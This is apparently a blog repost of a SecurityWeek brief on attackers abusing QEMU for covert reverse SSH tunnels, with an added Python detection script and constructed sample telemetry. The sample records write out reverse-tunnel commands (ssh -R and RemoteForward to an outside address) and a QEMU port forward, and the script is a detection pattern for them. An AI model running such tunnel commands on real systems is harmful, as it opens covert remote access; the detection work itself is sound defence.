
Hackers Abuse QEMU for Defense Evasion

Hackers have begun to abuse QEMU to hide malicious activity.

Threat actors have increasingly abused the QEMU machine emulator to hide malicious activity and deploy ransomware or remote access tools. Sophos observed campaigns since late 2025 in which attackers used QEMU virtual machines to establish covert reverse SSH tunnels, harvest credentials, and maintain persistence. Initial access was gained through vulnerabilities such as exposed SonicWall VPNs, SolarWinds Web Help Desk flaws, and the CitrixBleed2 bug. The activity appears linked to groups like Gold Encounter, and organizations are urged to look for unauthorized QEMU installations and suspicious SSH tunneling.
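The two hunting points the brief ends on, unauthorized QEMU installations and reverse SSH tunnels, can be turned into a simple triage pass over process telemetry. The following is an added example written for this post, not code from Sophos or SecurityWeek; the record fields (host, user, image, cmdline), the approved-host allowlist and the sample records are all constructed assumptions.

```python
# Hypothetical allowlist of hosts where QEMU is expected to run.
APPROVED_QEMU_HOSTS = {"lab-hypervisor-01"}
QEMU_NAMES = ("qemu-system", "qemu.exe", "qemu-img")
SSH_NAMES = {"ssh", "ssh.exe"}

def basename(path: str) -> str:
    """Last path component, tolerant of both / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def is_qemu(image: str) -> bool:
    return basename(image).startswith(QEMU_NAMES)

def ssh_reverse_tunnel(cmdline: str) -> bool:
    """True when an ssh command line asks for a remote (reverse) forward:
    -R, a bundled flag such as -NR, or -o RemoteForward=..."""
    argv = cmdline.split()  # whitespace split is adequate for telemetry strings
    if not argv or basename(argv[0]) not in SSH_NAMES:
        return False
    for tok in argv[1:]:
        if "RemoteForward=" in tok:
            return True
        if tok.startswith("-") and not tok.startswith("--") and "R" in tok[1:]:
            return True  # -R is the only ssh flag letter containing 'R'
    return False

def evaluate(rec: dict) -> list:
    """Findings for one process record; empty list means nothing to triage."""
    findings = []
    if is_qemu(rec["image"]) and rec["host"] not in APPROVED_QEMU_HOSTS:
        findings.append("unauthorized-qemu")
    if ssh_reverse_tunnel(rec["cmdline"]):
        findings.append("ssh-reverse-tunnel")
    return findings

def scan(records) -> list:
    return [(r["host"], r["user"], f) for r in records for f in evaluate(r)]

# Constructed sample telemetry (not from the article); 203.0.113.10 is a documentation address.
SAMPLE = [
    {"host": "lab-hypervisor-01", "user": "vmadmin", "image": "/usr/bin/qemu-system-x86_64",
     "cmdline": "qemu-system-x86_64 -m 4096 -hda lab.qcow2"},
    {"host": "ws-finance-07", "user": "svc_backup", "image": "C:\\Tools\\qemu\\qemu-system-x86_64.exe",
     "cmdline": "qemu-system-x86_64.exe -m 512 -netdev user,id=n0,hostfwd=tcp::2222-:22 -nographic"},
    {"host": "ws-finance-07", "user": "svc_backup", "image": "/usr/bin/ssh",
     "cmdline": "ssh -N -R 2222:127.0.0.1:22 ops@203.0.113.10"},
    {"host": "dev-box-12", "user": "asmith", "image": "/usr/bin/ssh",
     "cmdline": "ssh -L 8080:localhost:80 asmith@gitlab.internal"},
    {"host": "build-03", "user": "jdoe", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -o RemoteForward=0.0.0.0:2222:localhost:22 jdoe@203.0.113.10"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Local forwards (`-L`) and QEMU on the approved hypervisor produce no finding, so the output is only the workstation running an unapproved VM alongside a reverse tunnel and the build host pushing a RemoteForward.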

Read more:

https://www.securityweek.com/hackers-abuse-qemu-for-defense-evasion/